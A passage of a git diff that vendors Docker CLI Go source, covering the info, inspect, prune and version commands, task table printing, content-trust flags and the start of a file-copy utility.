+	fmt.Fprintf(dockerCli.Out(), " %s", strings.Join(info.Plugins.Network, " "))
+	fmt.Fprintf(dockerCli.Out(), "\n")
+
+	if len(info.Plugins.Authorization) != 0 {
+		fmt.Fprintf(dockerCli.Out(), " Authorization:")
+		fmt.Fprintf(dockerCli.Out(), " %s", strings.Join(info.Plugins.Authorization, " "))
+		fmt.Fprintf(dockerCli.Out(), "\n")
+	}
+
+	fmt.Fprintf(dockerCli.Out(), "Swarm: %v\n", info.Swarm.LocalNodeState)
+	if info.Swarm.LocalNodeState != swarm.LocalNodeStateInactive && info.Swarm.LocalNodeState != swarm.LocalNodeStateLocked {
+		fmt.Fprintf(dockerCli.Out(), " NodeID: %s\n", info.Swarm.NodeID)
+		if info.Swarm.Error != "" {
+			fmt.Fprintf(dockerCli.Out(), " Error: %v\n", info.Swarm.Error)
+		}
+		fmt.Fprintf(dockerCli.Out(), " Is Manager: %v\n", info.Swarm.ControlAvailable)
+		if info.Swarm.ControlAvailable {
+			fmt.Fprintf(dockerCli.Out(), " ClusterID: %s\n", info.Swarm.Cluster.ID)
+			fmt.Fprintf(dockerCli.Out(), " Managers: %d\n", info.Swarm.Managers)
+			fmt.Fprintf(dockerCli.Out(), " Nodes: %d\n", info.Swarm.Nodes)
+			fmt.Fprintf(dockerCli.Out(), " Orchestration:\n")
+			taskHistoryRetentionLimit := int64(0)
+			if info.Swarm.Cluster.Spec.Orchestration.TaskHistoryRetentionLimit != nil {
+				taskHistoryRetentionLimit = *info.Swarm.Cluster.Spec.Orchestration.TaskHistoryRetentionLimit
+			}
+			fmt.Fprintf(dockerCli.Out(), "  Task History Retention Limit: %d\n", taskHistoryRetentionLimit)
+			fmt.Fprintf(dockerCli.Out(), " Raft:\n")
+			fmt.Fprintf(dockerCli.Out(), "  Snapshot Interval: %d\n", info.Swarm.Cluster.Spec.Raft.SnapshotInterval)
+			if info.Swarm.Cluster.Spec.Raft.KeepOldSnapshots != nil {
+				fmt.Fprintf(dockerCli.Out(), "  Number of Old Snapshots to Retain: %d\n", *info.Swarm.Cluster.Spec.Raft.KeepOldSnapshots)
+			}
+			fmt.Fprintf(dockerCli.Out(), "  Heartbeat Tick: %d\n", info.Swarm.Cluster.Spec.Raft.HeartbeatTick)
+			fmt.Fprintf(dockerCli.Out(), "  Election Tick: %d\n", info.Swarm.Cluster.Spec.Raft.ElectionTick)
+			fmt.Fprintf(dockerCli.Out(), " Dispatcher:\n")
+			fmt.Fprintf(dockerCli.Out(), "  Heartbeat Period: %s\n", units.HumanDuration(time.Duration(info.Swarm.Cluster.Spec.Dispatcher.HeartbeatPeriod)))
+			fmt.Fprintf(dockerCli.Out(), " CA Configuration:\n")
+			fmt.Fprintf(dockerCli.Out(), "  Expiry Duration: %s\n", units.HumanDuration(info.Swarm.Cluster.Spec.CAConfig.NodeCertExpiry))
+			if len(info.Swarm.Cluster.Spec.CAConfig.ExternalCAs) > 0 {
+				fmt.Fprintf(dockerCli.Out(), "  External CAs:\n")
+				for _, entry := range info.Swarm.Cluster.Spec.CAConfig.ExternalCAs {
+					fmt.Fprintf(dockerCli.Out(), "    %s: %s\n", entry.Protocol, entry.URL)
+				}
+			}
+		}
+		fmt.Fprintf(dockerCli.Out(), " Node Address: %s\n", info.Swarm.NodeAddr)
+		managers := []string{}
+		for _, entry := range info.Swarm.RemoteManagers {
+			managers = append(managers, entry.Addr)
+		}
+		if len(managers) > 0 {
+			sort.Strings(managers)
+			fmt.Fprintf(dockerCli.Out(), " Manager Addresses:\n")
+			for _, entry := range managers {
+				fmt.Fprintf(dockerCli.Out(), "  %s\n", entry)
+			}
+		}
+	}
+
+	if len(info.Runtimes) > 0 {
+		fmt.Fprintf(dockerCli.Out(), "Runtimes:")
+		for name := range info.Runtimes {
+			fmt.Fprintf(dockerCli.Out(), " %s", name)
+		}
+		fmt.Fprint(dockerCli.Out(), "\n")
+		fmt.Fprintf(dockerCli.Out(), "Default Runtime: %s\n", info.DefaultRuntime)
+	}
+
+	if info.OSType == "linux" {
+		fmt.Fprintf(dockerCli.Out(), "Init Binary: %v\n", info.InitBinary)
+
+		for _, ci := range []struct {
+			Name   string
+			Commit types.Commit
+		}{
+			{"containerd", info.ContainerdCommit},
+			{"runc", info.RuncCommit},
+			{"init", info.InitCommit},
+		} {
+			fmt.Fprintf(dockerCli.Out(), "%s version: %s", ci.Name, ci.Commit.ID)
+			if ci.Commit.ID != ci.Commit.Expected {
+				fmt.Fprintf(dockerCli.Out(), " (expected: %s)", ci.Commit.Expected)
+			}
+			fmt.Fprintf(dockerCli.Out(), "\n")
+		}
+		if len(info.SecurityOptions) != 0 {
+			kvs, err := types.DecodeSecurityOptions(info.SecurityOptions)
+			if err != nil {
+				return err
+			}
+			fmt.Fprintf(dockerCli.Out(), "Security Options:\n")
+			for _, so := range kvs {
+				fmt.Fprintf(dockerCli.Out(), " %s\n", so.Name)
+				for _, o := range so.Options {
+					switch o.Key {
+					case "profile":
+						if o.Value != "default" {
+							fmt.Fprintf(dockerCli.Err(), "  WARNING: You're not using the default seccomp profile\n")
+						}
+						fmt.Fprintf(dockerCli.Out(), "  Profile: %s\n", o.Value)
+					}
+				}
+			}
+		}
+	}
+
+	// Isolation only has meaning on a Windows daemon.
+	if info.OSType == "windows" {
+		fmt.Fprintf(dockerCli.Out(), "Default Isolation: %v\n", info.Isolation)
+	}
+
+	ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Kernel Version: %s\n", info.KernelVersion)
+	ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Operating System: %s\n", info.OperatingSystem)
+	ioutils.FprintfIfNotEmpty(dockerCli.Out(), "OSType: %s\n", info.OSType)
+	ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Architecture: %s\n", info.Architecture)
+	fmt.Fprintf(dockerCli.Out(), "CPUs: %d\n", info.NCPU)
+	fmt.Fprintf(dockerCli.Out(), "Total Memory: %s\n", units.BytesSize(float64(info.MemTotal)))
+	ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Name: %s\n", info.Name)
+	ioutils.FprintfIfNotEmpty(dockerCli.Out(), "ID: %s\n", info.ID)
+	fmt.Fprintf(dockerCli.Out(), "Docker Root Dir: %s\n", info.DockerRootDir)
+	fmt.Fprintf(dockerCli.Out(), "Debug Mode (client): %v\n", utils.IsDebugEnabled())
+	fmt.Fprintf(dockerCli.Out(), "Debug Mode (server): %v\n", info.Debug)
+
+	if info.Debug {
+		fmt.Fprintf(dockerCli.Out(), " File Descriptors: %d\n", info.NFd)
+		fmt.Fprintf(dockerCli.Out(), " Goroutines: %d\n", info.NGoroutines)
+		fmt.Fprintf(dockerCli.Out(), " System Time: %s\n", info.SystemTime)
+		fmt.Fprintf(dockerCli.Out(), " EventsListeners: %d\n", info.NEventsListener)
+	}
+
+	ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Http Proxy: %s\n", info.HTTPProxy)
+	ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Https Proxy: %s\n", info.HTTPSProxy)
+	ioutils.FprintfIfNotEmpty(dockerCli.Out(), "No Proxy: %s\n", info.NoProxy)
+
+	if info.IndexServerAddress != "" {
+		u := dockerCli.ConfigFile().AuthConfigs[info.IndexServerAddress].Username
+		if len(u) > 0 {
+			fmt.Fprintf(dockerCli.Out(), "Username: %v\n", u)
+		}
+		fmt.Fprintf(dockerCli.Out(), "Registry: %v\n", info.IndexServerAddress)
+	}
+
+	// Only output these warnings if the server does not support these features
+	if info.OSType != "windows" {
+		if !info.MemoryLimit {
+			fmt.Fprintln(dockerCli.Err(), "WARNING: No memory limit support")
+		}
+		if !info.SwapLimit {
+			fmt.Fprintln(dockerCli.Err(), "WARNING: No swap limit support")
+		}
+		if !info.KernelMemory {
+			fmt.Fprintln(dockerCli.Err(), "WARNING: No kernel memory limit support")
+		}
+		if !info.OomKillDisable {
+			fmt.Fprintln(dockerCli.Err(), "WARNING: No oom kill disable support")
+		}
+		if !info.CPUCfsQuota {
+			fmt.Fprintln(dockerCli.Err(), "WARNING: No cpu cfs quota support")
+		}
+		if !info.CPUCfsPeriod {
+			fmt.Fprintln(dockerCli.Err(), "WARNING: No cpu cfs period support")
+		}
+		if !info.CPUShares {
+			fmt.Fprintln(dockerCli.Err(), "WARNING: No cpu shares support")
+		}
+		if !info.CPUSet {
+			fmt.Fprintln(dockerCli.Err(), "WARNING: No cpuset support")
+		}
+		if !info.IPv4Forwarding {
+			fmt.Fprintln(dockerCli.Err(), "WARNING: IPv4 forwarding is disabled")
+		}
+		if !info.BridgeNfIptables {
+			fmt.Fprintln(dockerCli.Err(), "WARNING: bridge-nf-call-iptables is disabled")
+		}
+		if !info.BridgeNfIP6tables {
+			fmt.Fprintln(dockerCli.Err(), "WARNING: bridge-nf-call-ip6tables is disabled")
+		}
+	}
+
+	if info.Labels != nil {
+		fmt.Fprintln(dockerCli.Out(), "Labels:")
+		for _, attribute := range info.Labels {
+			fmt.Fprintf(dockerCli.Out(), " %s\n", attribute)
+		}
+		// TODO: Engine labels with duplicate keys has been deprecated in 1.13 and will be error out
+		// after 3 release cycles (1.16). For now, a WARNING will be generated. The following will
+		// be removed eventually.
+		labelMap := map[string]string{}
+		for _, label := range info.Labels {
+			stringSlice := strings.SplitN(label, "=", 2)
+			if len(stringSlice) > 1 {
+				// If there is a conflict we will throw out an warning
+				if v, ok := labelMap[stringSlice[0]]; ok && v != stringSlice[1] {
+					fmt.Fprintln(dockerCli.Err(), "WARNING: labels with duplicate keys and conflicting values have been deprecated")
+					break
+				}
+				labelMap[stringSlice[0]] = stringSlice[1]
+			}
+		}
+	}
+
+	fmt.Fprintf(dockerCli.Out(), "Experimental: %v\n", info.ExperimentalBuild)
+	if info.ClusterStore != "" {
+		fmt.Fprintf(dockerCli.Out(), "Cluster Store: %s\n", info.ClusterStore)
+	}
+
+	if info.ClusterAdvertise != "" {
+		fmt.Fprintf(dockerCli.Out(), "Cluster Advertise: %s\n", info.ClusterAdvertise)
+	}
+
+	if info.RegistryConfig != nil && (len(info.RegistryConfig.InsecureRegistryCIDRs) > 0 || len(info.RegistryConfig.IndexConfigs) > 0) {
+		fmt.Fprintln(dockerCli.Out(), "Insecure Registries:")
+		for _, registry := range info.RegistryConfig.IndexConfigs {
+			if registry.Secure == false {
+				fmt.Fprintf(dockerCli.Out(), " %s\n", registry.Name)
+			}
+		}
+
+		for _, registry := range info.RegistryConfig.InsecureRegistryCIDRs {
+			mask, _ := registry.Mask.Size()
+			fmt.Fprintf(dockerCli.Out(), " %s/%d\n", registry.IP.String(), mask)
+		}
+	}
+
+	if info.RegistryConfig != nil && len(info.RegistryConfig.Mirrors) > 0 {
+		fmt.Fprintln(dockerCli.Out(), "Registry Mirrors:")
+		for _, mirror := range info.RegistryConfig.Mirrors {
+			fmt.Fprintf(dockerCli.Out(), " %s\n", mirror)
+		}
+	}
+
+	fmt.Fprintf(dockerCli.Out(), "Live Restore Enabled: %v\n", info.LiveRestoreEnabled)
+
+	return nil
+}
+
+func formatInfo(dockerCli *command.DockerCli, info types.Info, format string) error {
+	tmpl, err := templates.Parse(format)
+	if err != nil {
+		return cli.StatusError{StatusCode: 64,
+			Status: "Template parsing error: " + err.Error()}
+	}
+	err = tmpl.Execute(dockerCli.Out(), info)
+	dockerCli.Out().Write([]byte{'\n'})
+	return err
+}
diff --git a/vendor/github.com/docker/docker/cli/command/system/inspect.go b/vendor/github.com/docker/docker/cli/command/system/inspect.go
new file mode 100644
index 0000000000..c86e858a29
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/system/inspect.go
@@ -0,0 +1,203 @@
+package system
+
+import (
+	"fmt"
+	"strings"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/cli/command/inspect"
+	apiclient "github.com/docker/docker/client"
+	"github.com/spf13/cobra"
+)
+
+type inspectOptions struct {
+	format      string
+	inspectType string
+	size        bool
+	ids         []string
+}
+
+// NewInspectCommand creates a new cobra.Command for `docker inspect`
+func NewInspectCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts inspectOptions
+
+	cmd := &cobra.Command{
+		Use:   "inspect [OPTIONS] NAME|ID [NAME|ID...]",
+		Short: "Return low-level information on Docker objects",
+		Args:  cli.RequiresMinArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.ids = args
+			return runInspect(dockerCli, opts)
+		},
+	}
+
+	flags := cmd.Flags()
+	flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template")
+	flags.StringVar(&opts.inspectType, "type", "", "Return JSON for specified type")
+	flags.BoolVarP(&opts.size, "size", "s", false, "Display total file sizes if the type is container")
+
+	return cmd
+}
+
+func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error {
+	var elementSearcher inspect.GetRefFunc
+	switch opts.inspectType {
+	case "", "container", "image", "node", "network", "service", "volume", "task", "plugin":
+		elementSearcher = inspectAll(context.Background(), dockerCli, opts.size, opts.inspectType)
+	default:
+		return fmt.Errorf("%q is not a valid value for --type", opts.inspectType)
+	}
+	return inspect.Inspect(dockerCli.Out(), opts.ids, opts.format, elementSearcher)
+}
+
+func inspectContainers(ctx context.Context, dockerCli *command.DockerCli, getSize bool) inspect.GetRefFunc {
+	return func(ref string) (interface{}, []byte, error) {
+		return dockerCli.Client().ContainerInspectWithRaw(ctx, ref, getSize)
+	}
+}
+
+func inspectImages(ctx context.Context, dockerCli *command.DockerCli) inspect.GetRefFunc {
+	return func(ref string) (interface{}, []byte, error) {
+		return dockerCli.Client().ImageInspectWithRaw(ctx, ref)
+	}
+}
+
+func inspectNetwork(ctx context.Context, dockerCli *command.DockerCli) inspect.GetRefFunc {
+	return func(ref string) (interface{}, []byte, error) {
+		return dockerCli.Client().NetworkInspectWithRaw(ctx, ref)
+	}
+}
+
+func inspectNode(ctx context.Context, dockerCli *command.DockerCli) inspect.GetRefFunc {
+	return func(ref string) (interface{}, []byte, error) {
+		return dockerCli.Client().NodeInspectWithRaw(ctx, ref)
+	}
+}
+
+func inspectService(ctx context.Context, dockerCli *command.DockerCli) inspect.GetRefFunc {
+	return func(ref string) (interface{}, []byte, error) {
+		return dockerCli.Client().ServiceInspectWithRaw(ctx, ref)
+	}
+}
+
+func inspectTasks(ctx context.Context, dockerCli *command.DockerCli) inspect.GetRefFunc {
+	return func(ref string) (interface{}, []byte, error) {
+		return dockerCli.Client().TaskInspectWithRaw(ctx, ref)
+	}
+}
+
+func inspectVolume(ctx context.Context, dockerCli *command.DockerCli) inspect.GetRefFunc {
+	return func(ref string) (interface{}, []byte, error) {
+		return dockerCli.Client().VolumeInspectWithRaw(ctx, ref)
+	}
+}
+
+func inspectPlugin(ctx context.Context, dockerCli *command.DockerCli) inspect.GetRefFunc {
+	return func(ref string) (interface{}, []byte, error) {
+		return dockerCli.Client().PluginInspectWithRaw(ctx, ref)
+	}
+}
+
+func inspectAll(ctx context.Context, dockerCli *command.DockerCli, getSize bool, typeConstraint string) inspect.GetRefFunc {
+	var inspectAutodetect = []struct {
+		objectType      string
+		isSizeSupported bool
+		isSwarmObject   bool
+		objectInspector func(string) (interface{}, []byte, error)
+	}{
+		{
+			objectType:      "container",
+			isSizeSupported: true,
+			objectInspector: inspectContainers(ctx, dockerCli, getSize),
+		},
+		{
+			objectType:      "image",
+			objectInspector: inspectImages(ctx, dockerCli),
+		},
+		{
+			objectType:      "network",
+			objectInspector: inspectNetwork(ctx, dockerCli),
+		},
+		{
+			objectType:      "volume",
+			objectInspector: inspectVolume(ctx, dockerCli),
+		},
+		{
+			objectType:      "service",
+			isSwarmObject:   true,
+			objectInspector: inspectService(ctx, dockerCli),
+		},
+		{
+			objectType:      "task",
+			isSwarmObject:   true,
+			objectInspector: inspectTasks(ctx, dockerCli),
+		},
+		{
+			objectType:      "node",
+			isSwarmObject:   true,
+			objectInspector: inspectNode(ctx, dockerCli),
+		},
+		{
+			objectType:      "plugin",
+			objectInspector: inspectPlugin(ctx, dockerCli),
+		},
+	}
+
+	// isSwarmManager does an Info API call to verify that the daemon is
+	// a swarm manager.
+	isSwarmManager := func() bool {
+		info, err := dockerCli.Client().Info(ctx)
+		if err != nil {
+			fmt.Fprintln(dockerCli.Err(), err)
+			return false
+		}
+		return info.Swarm.ControlAvailable
+	}
+
+	isErrNotSupported := func(err error) bool {
+		return strings.Contains(err.Error(), "not supported")
+	}
+
+	return func(ref string) (interface{}, []byte, error) {
+		const (
+			swarmSupportUnknown = iota
+			swarmSupported
+			swarmUnsupported
+		)
+
+		isSwarmSupported := swarmSupportUnknown
+
+		for _, inspectData := range inspectAutodetect {
+			if typeConstraint != "" && inspectData.objectType != typeConstraint {
+				continue
+			}
+			if typeConstraint == "" && inspectData.isSwarmObject {
+				if isSwarmSupported == swarmSupportUnknown {
+					if isSwarmManager() {
+						isSwarmSupported = swarmSupported
+					} else {
+						isSwarmSupported = swarmUnsupported
+					}
+				}
+				if isSwarmSupported == swarmUnsupported {
+					continue
+				}
+			}
+			v, raw, err := inspectData.objectInspector(ref)
+			if err != nil {
+				if typeConstraint == "" && (apiclient.IsErrNotFound(err) || isErrNotSupported(err)) {
+					continue
+				}
+				return v, raw, err
+			}
+			if getSize && !inspectData.isSizeSupported {
+				fmt.Fprintf(dockerCli.Err(), "WARNING: --size ignored for %s\n", inspectData.objectType)
+			}
+			return v, raw, err
+		}
+		return nil, nil, fmt.Errorf("Error: No such object: %s", ref)
+	}
+}
diff --git a/vendor/github.com/docker/docker/cli/command/system/prune.go b/vendor/github.com/docker/docker/cli/command/system/prune.go
new file mode 100644
index 0000000000..92dddbdca6
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/system/prune.go
@@ -0,0 +1,93 @@
+package system
+
+import (
+	"fmt"
+
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/cli/command/prune"
+	units "github.com/docker/go-units"
+	"github.com/spf13/cobra"
+)
+
+type pruneOptions struct {
+	force bool
+	all   bool
+}
+
+// NewPruneCommand creates a new cobra.Command for `docker prune`
+func NewPruneCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts pruneOptions
+
+	cmd := &cobra.Command{
+		Use:   "prune [OPTIONS]",
+		Short: "Remove unused data",
+		Args:  cli.NoArgs,
+		RunE: func(cmd *cobra.Command, args []string) error {
+			return runPrune(dockerCli, opts)
+		},
+		Tags: map[string]string{"version": "1.25"},
+	}
+
+	flags := cmd.Flags()
+	flags.BoolVarP(&opts.force, "force", "f", false, "Do not prompt for confirmation")
+	flags.BoolVarP(&opts.all, "all", "a", false, "Remove all unused images not just dangling ones")
+
+	return cmd
+}
+
+const (
+	warning = `WARNING! This will remove:
+	- all stopped containers
+	- all volumes not used by at least one container
+	- all networks not used by at least one container
+	%s
+Are you sure you want to continue?`
+
+	danglingImageDesc = "- all dangling images"
+	allImageDesc      = `- all images without at least one container associated to them`
+)
+
+func runPrune(dockerCli *command.DockerCli, opts pruneOptions) error {
+	var message string
+
+	if opts.all {
+		message = fmt.Sprintf(warning, allImageDesc)
+	} else {
+		message = fmt.Sprintf(warning, danglingImageDesc)
+	}
+
+	if !opts.force && !command.PromptForConfirmation(dockerCli.In(), dockerCli.Out(), message) {
+		return nil
+	}
+
+	var spaceReclaimed uint64
+
+	for _, pruneFn := range []func(dockerCli *command.DockerCli) (uint64, string, error){
+		prune.RunContainerPrune,
+		prune.RunVolumePrune,
+		prune.RunNetworkPrune,
+	} {
+		spc, output, err := pruneFn(dockerCli)
+		if err != nil {
+			return err
+		}
+		spaceReclaimed += spc
+		if output != "" {
+			fmt.Fprintln(dockerCli.Out(), output)
+		}
+	}
+
+	spc, output, err := prune.RunImagePrune(dockerCli, opts.all)
+	if err != nil {
+		return err
+	}
+	if spc > 0 {
+		spaceReclaimed += spc
+		fmt.Fprintln(dockerCli.Out(), output)
+	}
+
+	fmt.Fprintln(dockerCli.Out(), "Total reclaimed space:", units.HumanSize(float64(spaceReclaimed)))
+
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/system/version.go b/vendor/github.com/docker/docker/cli/command/system/version.go
new file mode 100644
index 0000000000..ded4f4d118
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/system/version.go
@@ -0,0 +1,113 @@
+package system
+
+import (
+	"fmt"
+	"runtime"
+	"time"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/dockerversion"
+	"github.com/docker/docker/utils/templates"
+	"github.com/spf13/cobra"
+)
+
+var versionTemplate = `Client:
+ Version:      {{.Client.Version}}
+ API version:  {{.Client.APIVersion}}
+ Go version:   {{.Client.GoVersion}}
+ Git commit:   {{.Client.GitCommit}}
+ Built:        {{.Client.BuildTime}}
+ OS/Arch:      {{.Client.Os}}/{{.Client.Arch}}{{if .ServerOK}}
+
+Server:
+ Version:      {{.Server.Version}}
+ API version:  {{.Server.APIVersion}} (minimum version {{.Server.MinAPIVersion}})
+ Go version:   {{.Server.GoVersion}}
+ Git commit:   {{.Server.GitCommit}}
+ Built:        {{.Server.BuildTime}}
+ OS/Arch:      {{.Server.Os}}/{{.Server.Arch}}
+ Experimental: {{.Server.Experimental}}{{end}}`
+
+type versionOptions struct {
+	format string
+}
+
+// NewVersionCommand creates a new cobra.Command for `docker version`
+func NewVersionCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts versionOptions
+
+	cmd := &cobra.Command{
+		Use:   "version [OPTIONS]",
+		Short: "Show the Docker version information",
+		Args:  cli.NoArgs,
+		RunE: func(cmd *cobra.Command, args []string) error {
+			return runVersion(dockerCli, &opts)
+		},
+	}
+
+	flags := cmd.Flags()
+
+	flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template")
+
+	return cmd
+}
+
+func runVersion(dockerCli *command.DockerCli, opts *versionOptions) error {
+	ctx := context.Background()
+
+	templateFormat := versionTemplate
+	if opts.format != "" {
+		templateFormat = opts.format
+	}
+
+	tmpl, err := templates.Parse(templateFormat)
+	if err != nil {
+		return cli.StatusError{StatusCode: 64,
+			Status: "Template parsing error: " + err.Error()}
+	}
+
+	APIVersion := dockerCli.Client().ClientVersion()
+	if defaultAPIVersion := dockerCli.DefaultVersion(); APIVersion != defaultAPIVersion {
+		APIVersion = fmt.Sprintf("%s (downgraded from %s)", APIVersion, defaultAPIVersion)
+	}
+
+	vd := types.VersionResponse{
+		Client: &types.Version{
+			Version:    dockerversion.Version,
+			APIVersion: APIVersion,
+			GoVersion:  runtime.Version(),
+			GitCommit:  dockerversion.GitCommit,
+			BuildTime:  dockerversion.BuildTime,
+			Os:         runtime.GOOS,
+			Arch:       runtime.GOARCH,
+		},
+	}
+
+	serverVersion, err := dockerCli.Client().ServerVersion(ctx)
+	if err == nil {
+		vd.Server = &serverVersion
+	}
+
+	// first we need to make BuildTime more human friendly
+	t, errTime := time.Parse(time.RFC3339Nano, vd.Client.BuildTime)
+	if errTime == nil {
+		vd.Client.BuildTime = t.Format(time.ANSIC)
+	}
+
+	if vd.ServerOK() {
+		t, errTime = time.Parse(time.RFC3339Nano, vd.Server.BuildTime)
+		if errTime == nil {
+			vd.Server.BuildTime = t.Format(time.ANSIC)
+		}
+	}
+
+	if err2 := tmpl.Execute(dockerCli.Out(), vd); err2 != nil && err == nil {
+		err = err2
+	}
+	dockerCli.Out().Write([]byte{'\n'})
+	return err
+}
diff --git a/vendor/github.com/docker/docker/cli/command/task/print.go b/vendor/github.com/docker/docker/cli/command/task/print.go
new file mode 100644
index 0000000000..0f1c2cf724
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/task/print.go
@@ -0,0 +1,161 @@
+package task
+
+import (
+	"fmt"
+	"io"
+	"sort"
+	"strings"
+	"text/tabwriter"
+	"time"
+
+	"golang.org/x/net/context"
+
+	distreference "github.com/docker/distribution/reference"
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/cli/command/idresolver"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/go-units"
+)
+
+const (
+	psTaskItemFmt = "%s\t%s\t%s\t%s\t%s\t%s %s ago\t%s\t%s\n"
+	maxErrLength  = 30
+)
+
+type portStatus swarm.PortStatus
+
+func (ps portStatus) String() string {
+	if len(ps.Ports) == 0 {
+		return ""
+	}
+
+	str := fmt.Sprintf("*:%d->%d/%s", ps.Ports[0].PublishedPort, ps.Ports[0].TargetPort, ps.Ports[0].Protocol)
+	for _, pConfig := range ps.Ports[1:] {
+		str += fmt.Sprintf(",*:%d->%d/%s", pConfig.PublishedPort, pConfig.TargetPort, pConfig.Protocol)
+	}
+
+	return str
+}
+
+type tasksBySlot []swarm.Task
+
+func (t tasksBySlot) Len() int {
+	return len(t)
+}
+
+func (t tasksBySlot) Swap(i, j int) {
+	t[i], t[j] = t[j], t[i]
+}
+
+func (t tasksBySlot) Less(i, j int) bool {
+	// Sort by slot.
+	if t[i].Slot != t[j].Slot {
+		return t[i].Slot < t[j].Slot
+	}
+
+	// If same slot, sort by most recent.
+	return t[j].Meta.CreatedAt.Before(t[i].CreatedAt)
+}
+
+// Print task information in a table format.
+// Besides this, command `docker node ps <node>`
+// and `docker stack ps` will call this, too.
+func Print(dockerCli *command.DockerCli, ctx context.Context, tasks []swarm.Task, resolver *idresolver.IDResolver, noTrunc bool) error {
+	sort.Stable(tasksBySlot(tasks))
+
+	writer := tabwriter.NewWriter(dockerCli.Out(), 0, 4, 2, ' ', 0)
+
+	// Ignore flushing errors
+	defer writer.Flush()
+	fmt.Fprintln(writer, strings.Join([]string{"ID", "NAME", "IMAGE", "NODE", "DESIRED STATE", "CURRENT STATE", "ERROR", "PORTS"}, "\t"))
+
+	if err := print(writer, ctx, tasks, resolver, noTrunc); err != nil {
+		return err
+	}
+
+	return nil
+}
+
+// PrintQuiet shows task list in a quiet way.
+func PrintQuiet(dockerCli *command.DockerCli, tasks []swarm.Task) error {
+	sort.Stable(tasksBySlot(tasks))
+
+	out := dockerCli.Out()
+
+	for _, task := range tasks {
+		fmt.Fprintln(out, task.ID)
+	}
+
+	return nil
+}
+
+func print(out io.Writer, ctx context.Context, tasks []swarm.Task, resolver *idresolver.IDResolver, noTrunc bool) error {
+	prevName := ""
+	for _, task := range tasks {
+		id := task.ID
+		if !noTrunc {
+			id = stringid.TruncateID(id)
+		}
+
+		serviceName, err := resolver.Resolve(ctx, swarm.Service{}, task.ServiceID)
+		if err != nil {
+			return err
+		}
+
+		nodeValue, err := resolver.Resolve(ctx, swarm.Node{}, task.NodeID)
+		if err != nil {
+			return err
+		}
+
+		name := ""
+		if task.Slot != 0 {
+			name = fmt.Sprintf("%v.%v", serviceName, task.Slot)
+		} else {
+			name = fmt.Sprintf("%v.%v", serviceName, task.NodeID)
+		}
+
+		// Indent the name if necessary
+		indentedName := name
+		if name == prevName {
+			indentedName = fmt.Sprintf(" \\_ %s", indentedName)
+		}
+		prevName = name
+
+		// Trim and quote the error message.
+		taskErr := task.Status.Err
+		if !noTrunc && len(taskErr) > maxErrLength {
+			taskErr = fmt.Sprintf("%s…", taskErr[:maxErrLength-1])
+		}
+		if len(taskErr) > 0 {
+			taskErr = fmt.Sprintf("\"%s\"", taskErr)
+		}
+
+		image := task.Spec.ContainerSpec.Image
+		if !noTrunc {
+			ref, err := distreference.ParseNamed(image)
+			if err == nil {
+				// update image string for display
+				namedTagged, ok := ref.(distreference.NamedTagged)
+				if ok {
+					image = namedTagged.Name() + ":" + namedTagged.Tag()
+				}
+			}
+		}
+
+		fmt.Fprintf(
+			out,
+			psTaskItemFmt,
+			id,
+			indentedName,
+			image,
+			nodeValue,
+			command.PrettyPrint(task.DesiredState),
+			command.PrettyPrint(task.Status.State),
+			strings.ToLower(units.HumanDuration(time.Since(task.Status.Timestamp))),
+			taskErr,
+			portStatus(task.Status.PortStatus),
+		)
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/trust.go b/vendor/github.com/docker/docker/cli/command/trust.go
new file mode 100644
index 0000000000..b4c8a84ee5
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/trust.go
@@ -0,0 +1,39 @@
+package command
+
+import (
+	"os"
+	"strconv"
+
+	"github.com/spf13/pflag"
+)
+
+var (
+	// TODO: make this not global
+	untrusted bool
+)
+
+// AddTrustedFlags adds content trust flags to the current command flagset
+func AddTrustedFlags(fs *pflag.FlagSet, verify bool) {
+	trusted, message := setupTrustedFlag(verify)
+	fs.BoolVar(&untrusted, "disable-content-trust", !trusted, message)
+}
+
+func setupTrustedFlag(verify bool) (bool, string) {
+	var trusted bool
+	if e := os.Getenv("DOCKER_CONTENT_TRUST"); e != "" {
+		if t, err := strconv.ParseBool(e); t || err != nil {
+			// treat any other value as true
+			trusted = true
+		}
+	}
+	message := "Skip image signing"
+	if verify {
+		message = "Skip image verification"
+	}
+	return trusted, message
+}
+
+// IsTrusted returns true if content trust is enabled
+func IsTrusted() bool {
+	return !untrusted
+}
diff --git a/vendor/github.com/docker/docker/cli/command/utils.go b/vendor/github.com/docker/docker/cli/command/utils.go
new file mode 100644
index 0000000000..1837ca41f0
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/utils.go
@@ -0,0 +1,87 @@
+package command
+
+import (
+	"fmt"
+	"io"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"runtime"
+	"strings"
+)
+
+// CopyToFile writes the content of the reader to the specified file
+func CopyToFile(outfile string, r io.Reader) error {
+	tmpFile, err := ioutil.TempFile(filepath.Dir(outfile), ".docker_temp_")
+	if err != nil {
+		return err
+	}
+
+	tmpPath := tmpFile.Name()
+
